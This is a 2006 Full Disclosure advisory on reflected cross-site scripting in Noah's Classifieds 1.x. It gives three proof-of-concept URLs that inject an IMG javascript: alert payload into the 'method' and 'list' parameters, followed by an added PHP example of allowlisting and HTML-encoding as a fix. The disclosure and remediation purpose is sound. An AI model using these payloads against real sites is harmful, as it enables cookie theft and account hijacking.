Full Disclosure mailing list archives
Noah's Classifieds Multiple Cross-Site Scripting Vulnerabilities
From: "0o_zeus_o0 security-mx.org" <zeus.olimpusklan () gmail com>
Date: Wed, 8 Mar 2006 21:17:50 -0600
###########################################################################
# Advisory #10 Title: Noah's Classifieds Multiple Cross-Site Scripting Vulnerabilities
#
# Author: 0o_zeus_o0 ( Arturo Z. )
# Contact: zeus () diosdelared com
# Website: www.elitemexico.org
# Date: 09/03/2006
# Risk: Medium
# Vendor Url: http://classifieds.phpoutsourcing.com/
# Affected Software: Noah's Classifieds
# Non Affected:
#
# We Are: olimpus klan team
#
#Info:
##################################################################
#this bug consists of inserting script in the line of execution of
#the affected system causing the robbery of cookie and like consequence
#the identity robbery of the affected user or administrator
#
#Example XSS:
##################################################################
#
#http://www.example.com/[dirpath]/index.php?method=showhtmllist&list=<IMG SRC=`javascript:alert("0o_zeus_o0, 'XSS'")`>
#
#http://www.example.com/[dirpath]/index.php?method=<IMG SRC=`javascript:alert("0o_zeus_o0, 'XSS'")`>
#
#http://www.example.com/[dirpath]/index.php?method=login_form&list=<IMG SRC=`javascript:alert("0o_zeus_o0, 'XSS'")`>
#
##################################################################
#
#Solution:
##################################################################
#
#VULNERABLE VERSIONS
##################################################################
#
#1.x Other versions may also be affected.
#
##################################################################
#Contact information
#0o_zeus_o0
#zeus () diosdelared com
#www.elitemexico.org
##################################################################
#greetz: lady fire,Mi beba, olimpus klan team and elitemexico
###########################################################################
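The Solution section of the advisory is empty. As an added example (not part of the original post and not Noah's Classifieds source code), the PHP below shows one way to handle the "method" and "list" query parameters from the example URLs: allowlist the method name and HTML-encode every value echoed back. The function names, the default method and the output markup are hypothetical.

```php
<?php
// Added illustration; not Noah's Classifieds source code.
// "method", "list", "showhtmllist" and "login_form" come from the advisory's
// example URLs. Everything else here is hypothetical.

const ALLOWED_METHODS = ['showhtmllist', 'login_form'];
const DEFAULT_METHOD  = 'showhtmllist'; // assumed default for this sketch

// Encode for HTML element text or a quoted attribute value.
// ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE replaces invalid UTF-8
// instead of returning an empty string.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Dispatch only on known method names; arrays (method[]=x) and unknown
// strings fall back to the default instead of being reflected.
function pick_method(array $query): string
{
    $method = $query['method'] ?? DEFAULT_METHOD;
    if (!is_string($method) || !in_array($method, ALLOWED_METHODS, true)) {
        return DEFAULT_METHOD;
    }
    return $method;
}

// "list" is treated as opaque text here: accepted only as a string and
// always encoded at output time.
function pick_list(array $query): string
{
    $list = $query['list'] ?? '';
    return is_string($list) ? $list : '';
}

function render_fragment(array $query): string
{
    $method = pick_method($query);
    $list   = pick_list($query);
    return '<div class="' . h($method) . '">List: ' . h($list) . '</div>';
}

// Constructed sample input mirroring the third example URL.
$sample = [
    'method' => 'login_form',
    'list'   => '<IMG SRC=`javascript:alert("0o_zeus_o0, \'XSS\'")`>',
];
echo render_fragment($sample), PHP_EOL;
```

The encoding is only sufficient when the value lands in element text or a quoted attribute; a value written into an unquoted attribute, a URL or a script block needs context-specific handling.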